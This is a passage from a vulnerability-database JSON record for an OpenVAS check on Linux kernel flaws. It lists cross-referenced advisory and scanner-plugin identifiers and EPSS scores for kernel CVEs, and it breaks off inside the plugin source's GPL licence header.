"OPENVAS:1361412562310808316", "OPENVAS:1361412562310808336", "OPENVAS:1361412562310808414", "OPENVAS:1361412562310841713", "OPENVAS:1361412562310841715", "OPENVAS:1361412562310841718", "OPENVAS:1361412562310841723", "OPENVAS:1361412562310841724", "OPENVAS:1361412562310841725", "OPENVAS:1361412562310841739", "OPENVAS:1361412562310841740", "OPENVAS:1361412562310841743", "OPENVAS:1361412562310841744", "OPENVAS:1361412562310841749", "OPENVAS:1361412562310841897", "OPENVAS:1361412562310841902", "OPENVAS:1361412562310841903", "OPENVAS:1361412562310841906", "OPENVAS:1361412562310841976", "OPENVAS:1361412562310841977", "OPENVAS:1361412562310841978", "OPENVAS:1361412562310841979", "OPENVAS:1361412562310841980", "OPENVAS:1361412562310841981", "OPENVAS:1361412562310842565", "OPENVAS:1361412562310842567", "OPENVAS:1361412562310842568", "OPENVAS:1361412562310842569", "OPENVAS:1361412562310842571", "OPENVAS:1361412562310842572", "OPENVAS:1361412562310842574", "OPENVAS:1361412562310842575", "OPENVAS:1361412562310842621", "OPENVAS:1361412562310842622", "OPENVAS:1361412562310842623", "OPENVAS:1361412562310842624", "OPENVAS:1361412562310842625", "OPENVAS:1361412562310842627", "OPENVAS:1361412562310842628", "OPENVAS:1361412562310842629", "OPENVAS:1361412562310842631", "OPENVAS:1361412562310842632", "OPENVAS:1361412562310842707", "OPENVAS:1361412562310842708", "OPENVAS:1361412562310842709", "OPENVAS:1361412562310842710", "OPENVAS:1361412562310842711", "OPENVAS:1361412562310842712", "OPENVAS:1361412562310842713", "OPENVAS:1361412562310842734", "OPENVAS:1361412562310842735", "OPENVAS:1361412562310842741", "OPENVAS:1361412562310842755", "OPENVAS:1361412562310842759", "OPENVAS:1361412562310842762", "OPENVAS:1361412562310843001", "OPENVAS:1361412562310843210", "OPENVAS:1361412562310843220", "OPENVAS:1361412562310843234", "OPENVAS:1361412562310843247", "OPENVAS:1361412562310843249", "OPENVAS:1361412562310843252", "OPENVAS:1361412562310843254", "OPENVAS:1361412562310843255", "OPENVAS:1361412562310843312", "OPENVAS:1361412562310843354", "OPENVAS:1361412562310843357", "OPENVAS:1361412562310843358", "OPENVAS:1361412562310843496", "OPENVAS:1361412562310843497", "OPENVAS:1361412562310843547", "OPENVAS:1361412562310843551", "OPENVAS:1361412562310843576", "OPENVAS:1361412562310843577", "OPENVAS:1361412562310843595", "OPENVAS:1361412562310843596", "OPENVAS:1361412562310843628", "OPENVAS:1361412562310843822", "OPENVAS:1361412562310843823", "OPENVAS:1361412562310843954", "OPENVAS:1361412562310843960", "OPENVAS:1361412562310850587", "OPENVAS:1361412562310850626", "OPENVAS:1361412562310850628", "OPENVAS:1361412562310850746", "OPENVAS:1361412562310850750", "OPENVAS:1361412562310850762", "OPENVAS:1361412562310850776", "OPENVAS:1361412562310850801", "OPENVAS:1361412562310850805", "OPENVAS:1361412562310850817", "OPENVAS:1361412562310850836", "OPENVAS:1361412562310850881", "OPENVAS:1361412562310850918", "OPENVAS:1361412562310850994", "OPENVAS:1361412562310851057", "OPENVAS:1361412562310851138", "OPENVAS:1361412562310851157", "OPENVAS:1361412562310851176", "OPENVAS:1361412562310851197", "OPENVAS:1361412562310851242", "OPENVAS:1361412562310851273", "OPENVAS:1361412562310851320", "OPENVAS:1361412562310851349", "OPENVAS:1361412562310851358", "OPENVAS:1361412562310851386", "OPENVAS:1361412562310851390", "OPENVAS:1361412562310851449", "OPENVAS:1361412562310851566", "OPENVAS:1361412562310851895", "OPENVAS:1361412562310852091", "OPENVAS:1361412562310852108", "OPENVAS:1361412562310852140", "OPENVAS:1361412562310867520", "OPENVAS:1361412562310867939", "OPENVAS:1361412562310867967", "OPENVAS:1361412562310867986", "OPENVAS:1361412562310868019", "OPENVAS:1361412562310868055", "OPENVAS:1361412562310868076", "OPENVAS:1361412562310868101", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310868149", "OPENVAS:1361412562310868196", "OPENVAS:1361412562310868351", "OPENVAS:1361412562310868403", "OPENVAS:1361412562310868416", "OPENVAS:1361412562310868434", "OPENVAS:1361412562310868437", "OPENVAS:1361412562310868489", "OPENVAS:1361412562310868501", "OPENVAS:1361412562310868583", "OPENVAS:1361412562310868627", "OPENVAS:1361412562310868851", "OPENVAS:1361412562310868920", "OPENVAS:1361412562310868984", "OPENVAS:1361412562310869091", "OPENVAS:1361412562310869213", "OPENVAS:1361412562310869281", "OPENVAS:1361412562310869392", "OPENVAS:1361412562310871125", "OPENVAS:1361412562310871139", "OPENVAS:1361412562310871309", "OPENVAS:1361412562310871516", "OPENVAS:1361412562310871524", "OPENVAS:1361412562310871708", "OPENVAS:1361412562310873926", "OPENVAS:1361412562310873930", "OPENVAS:1361412562310874365", "OPENVAS:1361412562310874366", "OPENVAS:1361412562310874400", "OPENVAS:1361412562310874427", "OPENVAS:1361412562310874606", "OPENVAS:1361412562310874619", "OPENVAS:1361412562310874623", "OPENVAS:1361412562310874647", "OPENVAS:1361412562310874695", "OPENVAS:1361412562310874721", "OPENVAS:1361412562310874751", "OPENVAS:1361412562310874761", "OPENVAS:1361412562310874813", "OPENVAS:1361412562310874890", "OPENVAS:1361412562310874919", "OPENVAS:1361412562310874964", "OPENVAS:1361412562310874998", "OPENVAS:1361412562310875099", "OPENVAS:1361412562310875128", "OPENVAS:1361412562310875170", "OPENVAS:1361412562310875172", "OPENVAS:1361412562310875201", "OPENVAS:1361412562310875334", "OPENVAS:1361412562310881879", "OPENVAS:1361412562310881900", "OPENVAS:1361412562310882114", "OPENVAS:1361412562310882342", "OPENVAS:1361412562310883220", "OPENVAS:1361412562310891099", "OPENVAS:1361412562310891232", "OPENVAS:1361412562310891392", "OPENVAS:1361412562310891422", "OPENVAS:1361412562311220161020", "OPENVAS:1361412562311220171245", "OPENVAS:1361412562311220171271", "OPENVAS:1361412562311220181026", "OPENVAS:1361412562311220181031", "OPENVAS:1361412562311220181263", "OPENVAS:1361412562311220181297", "OPENVAS:1361412562311220181373", "OPENVAS:1361412562311220181407", "OPENVAS:1361412562311220191062", "OPENVAS:1361412562311220191156", "OPENVAS:1361412562311220191475", "OPENVAS:1361412562311220191477", "OPENVAS:1361412562311220191481", "OPENVAS:1361412562311220191485", "OPENVAS:1361412562311220191488", "OPENVAS:1361412562311220191492", "OPENVAS:1361412562311220191498", "OPENVAS:1361412562311220191499", "OPENVAS:1361412562311220191501", "OPENVAS:1361412562311220191507", "OPENVAS:1361412562311220191587", "OPENVAS:702906", "OPENVAS:703414", "OPENVAS:703426", "OPENVAS:703454", "OPENVAS:703503", "OPENVAS:841713", "OPENVAS:841715", "OPENVAS:841718", "OPENVAS:841723", "OPENVAS:841724", "OPENVAS:841725", "OPENVAS:841739", "OPENVAS:841740", "OPENVAS:841743", "OPENVAS:841744", "OPENVAS:841749", "OPENVAS:871125", "OPENVAS:871139", "OPENVAS:881879", "OPENVAS:881900"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2016", "ORACLE:CPUJAN2018", "ORACLE:CPUJUL2016", "ORACLE:CPUOCT2019"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0159", "ELSA-2014-0285", "ELSA-2014-0285-1", "ELSA-2014-1997", "ELSA-2014-3009", "ELSA-2014-3010", "ELSA-2014-3011", "ELSA-2014-3106", "ELSA-2014-3107", "ELSA-2014-3108", "ELSA-2015-0102", "ELSA-2015-0290", "ELSA-2015-2552", "ELSA-2015-2636", "ELSA-2015-3107", "ELSA-2016-0855", "ELSA-2016-2574", "ELSA-2016-3502", "ELSA-2016-3503", "ELSA-2016-3596", "ELSA-2017-3515", "ELSA-2017-3516", "ELSA-2017-3533", "ELSA-2017-3534", "ELSA-2017-3567", "ELSA-2017-3635", "ELSA-2017-3636", "ELSA-2017-3637", "ELSA-2017-3657", "ELSA-2017-3658", "ELSA-2017-3659", "ELSA-2018-1062", "ELSA-2018-3083", "ELSA-2018-4109", "ELSA-2018-4110", "ELSA-2018-4270", "ELSA-2018-4288", "ELSA-2018-4300", "ELSA-2018-4301", "ELSA-2018-4304", "ELSA-2019-4823", "ELSA-2019-4854", "ELSA-2019-4855", "ELSA-2020-1524", "ELSA-2020-5708"]}, {"type": "osv", "idList": ["OSV:DLA-103-1", "OSV:DLA-1099-1", "OSV:DLA-1232-1", "OSV:DLA-1392-1", "OSV:DLA-1422-1", "OSV:DLA-1422-2", "OSV:DLA-1423-1", "OSV:DLA-1715-1", "OSV:DLA-360-1", "OSV:DLA-479-1", "OSV:DLA-772-1", "OSV:DSA-2906-1", "OSV:DSA-3414-1", "OSV:DSA-3426-1", "OSV:DSA-3454-1", "OSV:DSA-3503-1", "OSV:DSA-3981-1", "OSV:DSA-4073-1", "OSV:DSA-4082-1", "OSV:DSA-4313-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139716"]}, {"type": "photon", "idList": ["PHSA-2017-0008", "PHSA-2017-0010", "PHSA-2017-0041", "PHSA-2017-0052", "PHSA-2017-0078", "PHSA-2017-0091", "PHSA-2018-0031", "PHSA-2018-0041", "PHSA-2018-0132", "PHSA-2018-0150"]}, {"type": "redhat", "idList": ["RHSA-2014:0159", "RHSA-2014:0285", "RHSA-2014:0439", "RHSA-2014:1318", "RHSA-2014:1997", "RHSA-2015:0102", "RHSA-2015:0695", "RHSA-2015:0782", "RHSA-2015:0803", "RHSA-2015:2552", "RHSA-2015:2636", "RHSA-2015:2645", "RHSA-2016:0004", "RHSA-2016:0024", "RHSA-2016:0046", "RHSA-2016:0103", "RHSA-2016:2574", "RHSA-2016:2584", "RHSA-2017:0217", "RHSA-2018:0676", "RHSA-2018:1062", "RHSA-2018:2948", "RHSA-2018:3083", "RHSA-2018:3096", "RHSA-2018:3656", "RHSA-2019:1170", "RHSA-2019:1190", "RHSA-2019:4057", "RHSA-2019:4058", "RHSA-2020:0036", "RHSA-2020:1524"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9178", "RH:CVE-2016-9644", "RH:CVE-2017-1000370", "RH:CVE-2017-1000371", "RH:CVE-2017-10661", "RH:CVE-2017-14991", "RH:CVE-2017-17558", "RH:CVE-2017-9150", "RH:CVE-2018-10940", "RH:CVE-2018-18021"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30233", "SECURITYVULNS:DOC:30916", "SECURITYVULNS:DOC:30929", "SECURITYVULNS:DOC:31112", "SECURITYVULNS:DOC:31315", "SECURITYVULNS:VULN:13475", "SECURITYVULNS:VULN:13844", "SECURITYVULNS:VULN:13951"]}, {"type": "slackware", "idList": ["SSA-2019-030-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0678-1", "OPENSUSE-SU-2014:1669-1", "OPENSUSE-SU-2014:1677-1", "OPENSUSE-SU-2015:0566-1", "OPENSUSE-SU-2016:0124-1", "OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2016:0318-1", "OPENSUSE-SU-2016:1008-1", "OPENSUSE-SU-2016:1382-1", "OPENSUSE-SU-2016:1641-1", "OPENSUSE-SU-2016:2144-1", "OPENSUSE-SU-2016:2290-1", "OPENSUSE-SU-2016:2649-1", "OPENSUSE-SU-2016:3058-1", "OPENSUSE-SU-2017:1513-1", "OPENSUSE-SU-2018:2738-1", "OPENSUSE-SU-2018:3071-1", "OPENSUSE-SU-2018:3658-1", "OPENSUSE-SU-2018:3817-1", "SUSE-SU-2014:0459-1", "SUSE-SU-2014:0531-1", "SUSE-SU-2014:0537-1", "SUSE-SU-2014:0696-1", "SUSE-SU-2014:0807-1", "SUSE-SU-2014:1316-1", "SUSE-SU-2014:1319-1", "SUSE-SU-2014:1693-1", "SUSE-SU-2014:1693-2", "SUSE-SU-2014:1695-1", "SUSE-SU-2014:1695-2", "SUSE-SU-2015:0481-1", "SUSE-SU-2015:0581-1", "SUSE-SU-2015:0652-1", "SUSE-SU-2015:0736-1", "SUSE-SU-2015:0812-1", "SUSE-SU-2015:2108-1", "SUSE-SU-2015:2194-1", "SUSE-SU-2015:2339-1", "SUSE-SU-2015:2350-1", "SUSE-SU-2016:0354-1", "SUSE-SU-2016:0585-1", "SUSE-SU-2016:0658-1", "SUSE-SU-2016:0745-1", "SUSE-SU-2016:0746-1", "SUSE-SU-2016:0747-1", "SUSE-SU-2016:0749-1", "SUSE-SU-2016:0750-1", "SUSE-SU-2016:0751-1", "SUSE-SU-2016:0752-1", "SUSE-SU-2016:0753-1", "SUSE-SU-2016:0754-1", "SUSE-SU-2016:0755-1", "SUSE-SU-2016:0756-1", "SUSE-SU-2016:0757-1", "SUSE-SU-2016:0785-1", "SUSE-SU-2016:0911-1", "SUSE-SU-2016:1102-1", "SUSE-SU-2016:1203-1", "SUSE-SU-2016:1672-1", "SUSE-SU-2016:1690-1", "SUSE-SU-2016:1696-1", "SUSE-SU-2016:1707-1", "SUSE-SU-2016:1937-1", "SUSE-SU-2016:1961-1", "SUSE-SU-2016:1994-1", "SUSE-SU-2016:1995-1", "SUSE-SU-2016:2000-1", "SUSE-SU-2016:2001-1", "SUSE-SU-2016:2002-1", "SUSE-SU-2016:2003-1", "SUSE-SU-2016:2005-1", "SUSE-SU-2016:2006-1", "SUSE-SU-2016:2007-1", "SUSE-SU-2016:2009-1", "SUSE-SU-2016:2010-1", "SUSE-SU-2016:2011-1", "SUSE-SU-2016:2014-1", "SUSE-SU-2016:2074-1", "SUSE-SU-2017:1853-1", "SUSE-SU-2017:1990-1", "SUSE-SU-2017:2525-1", "SUSE-SU-2017:2694-1", "SUSE-SU-2017:2908-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2017:3286-1", "SUSE-SU-2017:3287-1", "SUSE-SU-2017:3288-1", "SUSE-SU-2017:3289-1", "SUSE-SU-2017:3290-1", "SUSE-SU-2017:3291-1", "SUSE-SU-2017:3292-1", "SUSE-SU-2017:3293-1", "SUSE-SU-2017:3296-1", "SUSE-SU-2017:3299-1", "SUSE-SU-2017:3301-1", "SUSE-SU-2017:3302-1", "SUSE-SU-2017:3303-1", "SUSE-SU-2017:3304-1", "SUSE-SU-2017:3305-1", "SUSE-SU-2017:3306-1", "SUSE-SU-2017:3308-1", "SUSE-SU-2017:3309-1", "SUSE-SU-2017:3310-1", "SUSE-SU-2017:3312-1", "SUSE-SU-2017:3313-1", "SUSE-SU-2017:3316-1", "SUSE-SU-2017:3318-1", "SUSE-SU-2017:3320-1", "SUSE-SU-2017:3321-1", "SUSE-SU-2017:3322-1", "SUSE-SU-2017:3323-1", "SUSE-SU-2017:3332-1", "SUSE-SU-2017:3336-1", "SUSE-SU-2017:3337-1", "SUSE-SU-2017:3340-1", "SUSE-SU-2018:0011-1", "SUSE-SU-2018:0031-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:0115-1", "SUSE-SU-2018:0180-1"]}, {"type": "symantec", "idList": ["SMNTC-110486"]}, {"type": "thn", "idList": ["THN:9B30E750177FCE2138C2D9F3C42B178A"]}, {"type": "ubuntu", "idList": ["USN-2107-1", "USN-2108-1", "USN-2109-1", "USN-2110-1", "USN-2113-1", "USN-2117-1", "USN-2135-1", "USN-2136-1", "USN-2138-1", "USN-2139-1", "USN-2141-1", "USN-2287-1", "USN-2288-1", "USN-2289-1", "USN-2290-1", "USN-2354-1", "USN-2355-1", "USN-2356-1", "USN-2357-1", "USN-2358-1", "USN-2359-1", "USN-2840-1", "USN-2841-1", "USN-2841-2", "USN-2842-1", "USN-2842-2", "USN-2843-1", "USN-2843-2", "USN-2844-1", "USN-2886-1", "USN-2886-2", "USN-2887-1", "USN-2887-2", "USN-2888-1", "USN-2889-1", "USN-2889-2", "USN-2890-1", "USN-2890-2", "USN-2890-3", "USN-2946-1", "USN-2946-2", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2949-1", "USN-2965-1", "USN-2965-2", "USN-2965-3", "USN-2965-4", "USN-2967-1", "USN-2967-2", "USN-3161-3", "USN-3345-1", "USN-3359-1", "USN-3361-1", "USN-3364-1", "USN-3364-2", "USN-3364-3", "USN-3422-1", "USN-3422-2", "USN-3469-1", "USN-3469-2", "USN-3470-1", "USN-3470-2", "USN-3619-1", "USN-3619-2", "USN-3676-1", "USN-3676-2", "USN-3695-1", "USN-3695-2", "USN-3718-1", "USN-3718-2", "USN-3754-1", "USN-3821-1", "USN-3821-2", "USN-3931-1", "USN-3931-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-7263", "UB:CVE-2013-7445", "UB:CVE-2013-7446", "UB:CVE-2014-4611", "UB:CVE-2014-4715", "UB:CVE-2014-5471", "UB:CVE-2014-9914", "UB:CVE-2015-0571", "UB:CVE-2015-8104", "UB:CVE-2015-8950", "UB:CVE-2016-2550", "UB:CVE-2016-2847", "UB:CVE-2016-4557", "UB:CVE-2016-9178", "UB:CVE-2016-9644", "UB:CVE-2017-1000370", "UB:CVE-2017-1000371", "UB:CVE-2017-10661", "UB:CVE-2017-14991", "UB:CVE-2017-17558", "UB:CVE-2017-9150", "UB:CVE-2018-10940", "UB:CVE-2018-16658", "UB:CVE-2018-18021", "UB:CVE-2018-18710"]}, {"type": "veracode", "idList": ["VERACODE:25067"]}, {"type": "virtuozzo", "idList": ["VZA-2017-075", "VZA-2017-076", "VZA-2020-036", "VZA-2020-037"]}, {"type": "xen", "idList": ["XSA-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-25577", "1337DAY-ID-26328", "1337DAY-ID-29249"]}]}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-845", "ALAS-2017-914"]}, {"type": "android", "idList": ["ANDROID:CVE-2014-9914"]}, {"type": "androidsecurity", "idList": ["ANDROID:2017-02-01", "ANDROID:2017-08-01", "ANDROID:2017-09-01", "ANDROID:2018-06-01"]}, {"type": "archlinux", "idList": ["ASA-201801-1", "ASA-201801-2", "ASA-201801-4"]}, {"type": "avleonov", "idList": ["AVLEONOV:A9AB661A53F0E9B8923DE780E6F05F48"]}, {"type": "centos", "idList": ["CESA-2020:1524"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:8CFC2758BB5A33EFE62E28CBCF6F0C0C"]}, {"type": "cve", "idList": ["CVE-2013-7263", "CVE-2013-7445", "CVE-2013-7446", "CVE-2015-8104", "CVE-2016-4557", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-9150"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1099-1:57108", "DEBIAN:DLA-1232-1:15F37", "DEBIAN:DLA-1392-1:883BE", "DEBIAN:DLA-1422-1:EBC6F", "DEBIAN:DLA-1422-2:DC70E", "DEBIAN:DLA-1423-1:B239D", "DEBIAN:DSA-3426-1:AC984", "DEBIAN:DSA-3981-1:0F636", "DEBIAN:DSA-4073-1:79398", "DEBIAN:DSA-4082-1:57979", "DEBIAN:DSA-4313-1:C711E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-7263", "DEBIANCVE:CVE-2013-7445", "DEBIANCVE:CVE-2013-7446", "DEBIANCVE:CVE-2014-4611", "DEBIANCVE:CVE-2014-5471", "DEBIANCVE:CVE-2014-9914", "DEBIANCVE:CVE-2015-8104", "DEBIANCVE:CVE-2015-8950", "DEBIANCVE:CVE-2016-2550", "DEBIANCVE:CVE-2016-2847", "DEBIANCVE:CVE-2016-4557", "DEBIANCVE:CVE-2016-9178", "DEBIANCVE:CVE-2017-1000370", "DEBIANCVE:CVE-2017-1000371", "DEBIANCVE:CVE-2017-10661", "DEBIANCVE:CVE-2017-14991", "DEBIANCVE:CVE-2017-17558", "DEBIANCVE:CVE-2017-9150", "DEBIANCVE:CVE-2018-10940", "DEBIANCVE:CVE-2018-18021"]}, {"type": "exploitdb", "idList": ["EDB-ID:42273", "EDB-ID:42274", "EDB-ID:42276"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:68588737FAF0ED161AC1D6A540E77231"]}, {"type": "f5", "idList": ["F5:K11165942", "F5:K25423771", "F5:K40523020", "SOL15983"]}, {"type": "fedora", "idList": ["FEDORA:08D3760E6566", "FEDORA:10F7D6255145", "FEDORA:25BDD6190ECF", "FEDORA:29049600CFF3", "FEDORA:29FCE65ECD33", "FEDORA:43F19601E6CD", "FEDORA:44065605602A", "FEDORA:4832F6079717", "FEDORA:5D742610B071", "FEDORA:648496077DD1", "FEDORA:6EC6360BEA04", "FEDORA:6F1BC604D0C1", "FEDORA:74245604D4DA", "FEDORA:7640C641CB61", "FEDORA:7F8C960BC98D", "FEDORA:87BD56087904", "FEDORA:8F974604E846", "FEDORA:909D360491BF", "FEDORA:AB52460321C9", "FEDORA:B395E6087A9D", "FEDORA:B54D264CBCAC", "FEDORA:D15E060F33C2", "FEDORA:D6F86601E6D9", "FEDORA:DF5176048167", "FEDORA:E1D7E6031252", "FEDORA:E6F08605DCE7"]}, {"type": "freebsd", "idList": ["2CABFBAB-8BFB-11E5-BD18-002590263BF5"]}, {"type": "hackerone", "idList": ["H1:17688"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20161026-02-SMARTPHONE"]}, {"type": "ibm", "idList": ["22DFDD1FF1BBF70D9C813ACA916818103631328A11AEED7718476AD8FD37F722"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2017-17558/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-17558/", "MSF:ILITIES/ORACLE_LINUX-CVE-2017-17558/", "MSF:ILITIES/SUSE-CVE-2017-17558/"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-669.NASL", "ALA_ALAS-2017-845.NASL", "CENTOS_RHSA-2020-1524.NASL", "DEBIAN_DLA-1232.NASL", "DEBIAN_DLA-360.NASL", "DEBIAN_DSA-4082.NASL", "DEBIAN_DSA-4313.NASL", "EULEROS_SA-2017-1271.NASL", "EULEROS_SA-2018-1297.NASL", "EULEROS_SA-2019-1485.NASL", "FEDORA_2014-8487.NASL", "FEDORA_2015-115C302856.NASL", "FEDORA_2016-06F1572324.NASL", "FEDORA_2016-1642A20327.NASL", "FEDORA_2016-746BB5851D.NASL", "FEDORA_2016-84FDC82B74.NASL", "FEDORA_2016-E6CFAFF4B1.NASL", "FEDORA_2016-EF973EFAB7.NASL", "FEDORA_2017-05F10E29F4.NASL", "FEDORA_2017-D3ED702FE4.NASL", "FEDORA_2017-D7BC1B3056.NASL", "FEDORA_2018-94315E9A6B.NASL", "OPENSUSE-2017-666.NASL", "OPENSUSE-2018-1140.NASL", "OPENSUSE-2018-1427.NASL", "OPENSUSE-2019-769.NASL", "OPENSUSE-2019-893.NASL", "ORACLELINUX_ELSA-2017-3635.NASL", "ORACLELINUX_ELSA-2017-3636.NASL", "ORACLELINUX_ELSA-2017-3637.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLELINUX_ELSA-2019-4823.NASL", "ORACLELINUX_ELSA-2020-1524.NASL", "ORACLEVM_OVMSA-2017-0167.NASL", "ORACLEVM_OVMSA-2017-0168.NASL", "ORACLEVM_OVMSA-2019-0047.NASL", "REDHAT-RHSA-2020-1524.NASL", "SLACKWARE_SSA_2019-030-01.NASL", "SL_20200422_KERNEL_ON_SL6_X.NASL", "SUSE_SU-2016-1696-1.NASL", "SUSE_SU-2017-1853-1.NASL", "SUSE_SU-2017-2920-1.NASL", "SUSE_SU-2018-0031-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-2858-1.NASL", "SUSE_SU-2018-2879-1.NASL", "SUSE_SU-2018-2907-1.NASL", "SUSE_SU-2018-2908-1.NASL", "SUSE_SU-2018-3083-1.NASL", "SUSE_SU-2018-3084-1.NASL", "SUSE_SU-2019-0224-1.NASL", "SUSE_SU-2019-0439-1.NASL", "SUSE_SU-2019-1289-1.NASL", "SUSE_SU-2019-13937-1.NASL", "UBUNTU_USN-2889-1.NASL", "UBUNTU_USN-3324-1.NASL", "UBUNTU_USN-3325-1.NASL", "UBUNTU_USN-3345-1.NASL", "UBUNTU_USN-3469-1.NASL", "UBUNTU_USN-3469-2.NASL", "UBUNTU_USN-3470-1.NASL", "UBUNTU_USN-3931-1.NASL", "UBUNTU_USN-3931-2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310131137", "OPENVAS:1361412562310704313", "OPENVAS:1361412562310841724", "OPENVAS:1361412562310842623", "OPENVAS:1361412562310843210", "OPENVAS:1361412562310843220", "OPENVAS:1361412562310843354", "OPENVAS:1361412562310843357", "OPENVAS:1361412562310843358", "OPENVAS:1361412562310850881", "OPENVAS:1361412562310851566", "OPENVAS:1361412562310852140", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310871516", "OPENVAS:1361412562310875099", "OPENVAS:1361412562310883220", "OPENVAS:1361412562310891232"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2019-5072832"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-3635", "ELSA-2017-3636", "ELSA-2017-3637", "ELSA-2018-4288", "ELSA-2020-1524"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139716"]}, {"type": "photon", "idList": ["PHSA-2017-0008", "PHSA-2017-0041", "PHSA-2017-0052"]}, {"type": "redhat", "idList": ["RHSA-2018:3656"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9178", "RH:CVE-2016-9644", "RH:CVE-2017-1000370", "RH:CVE-2017-1000371", "RH:CVE-2017-10661", "RH:CVE-2017-14991", "RH:CVE-2017-17558", "RH:CVE-2017-9150"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13951"]}, {"type": "slackware", "idList": ["SSA-2019-030-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1513-1", "OPENSUSE-SU-2018:3071-1", "OPENSUSE-SU-2018:3817-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2018:0040-1"]}, {"type": "thn", "idList": ["THN:9B30E750177FCE2138C2D9F3C42B178A"]}, {"type": "ubuntu", "idList": ["USN-2141-1", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2967-1", "USN-2967-2", "USN-3470-2", "USN-3821-1", "USN-3821-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-10940", "UB:CVE-2018-18021"]}, {"type": "virtuozzo", "idList": ["VZA-2017-075", "VZA-2017-076"]}, {"type": "xen", "idList": ["XSA-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-25577"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-8950", "epss": "0.000820000", "percentile": "0.333740000", "modified": "2023-03-15"}, {"cve": "CVE-2017-17558", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2018-10940", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2016-4557", "epss": "0.000890000", "percentile": "0.365860000", "modified": "2023-03-15"}, {"cve": "CVE-2017-14991", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2016-2847", "epss": "0.001000000", "percentile": "0.397550000", "modified": "2023-03-15"}, {"cve": "CVE-2017-10661", "epss": "0.000910000", "percentile": "0.375750000", "modified": "2023-03-15"}, {"cve": "CVE-2016-9178", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2018-18021", "epss": "0.000460000", "percentile": "0.140400000", "modified": "2023-03-15"}, {"cve": "CVE-2017-9150", "epss": "0.000760000", "percentile": "0.306620000", "modified": "2023-03-15"}, {"cve": "CVE-2014-4715", "epss": "0.005600000", "percentile": "0.742660000", "modified": "2023-03-15"}, {"cve": "CVE-2016-2550", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9914", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2015-0571", "epss": "0.001190000", "percentile": "0.444180000", "modified": "2023-03-15"}, {"cve": "CVE-2014-4611", "epss": "0.011740000", "percentile": "0.828060000", "modified": "2023-03-15"}, {"cve": "CVE-2017-1000370", "epss": "0.000620000", "percentile": "0.245740000", "modified": "2023-03-15"}, {"cve": "CVE-2013-7263", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2017-1000371", "epss": "0.000620000", "percentile": "0.245740000", "modified": "2023-03-15"}, {"cve": "CVE-2013-7446", "epss": "0.000460000", "percentile": "0.140030000", "modified": "2023-03-15"}, {"cve": "CVE-2014-5471", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2013-7445", "epss": "0.001490000", "percentile": "0.491970000", "modified": "2023-03-15"}, {"cve": "CVE-2015-8104", "epss": "0.000720000", "percentile": "0.293980000", "modified": "2023-03-15"}], "vulnersScore": 0.4}, "_state": {"dependencies": 1678957314, "score": 1683999172, "epss": 1678957426}, "_internal": {"score_hash": "03b7146dfa57413f83b4e973d1f8fedb"}, "pluginID": "1361412562311220191536", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 